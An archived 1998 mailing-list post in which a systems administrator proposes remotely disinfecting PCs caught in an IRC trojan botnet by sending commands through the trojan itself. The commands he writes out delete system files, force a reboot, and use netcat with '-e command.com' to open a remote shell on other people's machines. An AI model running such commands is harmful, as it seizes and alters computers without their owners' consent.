Re: Internet Wide DOS Attack using IRC

From: George Imburgia (gtiat_private)
Date: Sat Oct 03 1998 - 05:30:08 PDT

    On Fri, 2 Oct 1998, Samuel Cossette wrote:

    > When a clone (Havoc call an infected computer a "Drone") is connected on irc
    > anybody can control this with Private msg command (.join #chan, .part, .do
    > [raw command]). 2-3 week ago the infected chan get about 500-700 drones
    > (stable). My personnal estimation of infected computer it's 15000+.

    With the DO command enabled, they gave us the means to remotely disable
    this trojan.

    Something to the effect of;

    msg <nick> .do del c:\windows\system\oce*.*

    Then, msg <nick> .do <some evil command to lock up the machine, forcing a
    reboot>.

    I'd be happy to write something cleaner and more specific, if someone
    could forward me a copy of this trojan, or at least a directory listing of
    the c:\windows\system directory on an infected machine.

    The mIRC DO command is very powerful, and can be used to install netcat on
    the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
    -p <any port> <your ip> -t -e command.com, giving a remote command prompt
    to investigate/disinfect the machine.

    Anyone with a copy of this, feel free to mail me here, or contact
    Phatass on EFnet.

    George Imburgia                                      e-mail: gtiat_private
    Systems Administrator                                Phone:  (302)739-4068
    Delaware Technical & Community College               Fax:    (302)739-3345
    Office of the President                              Pager:  (302)741-5962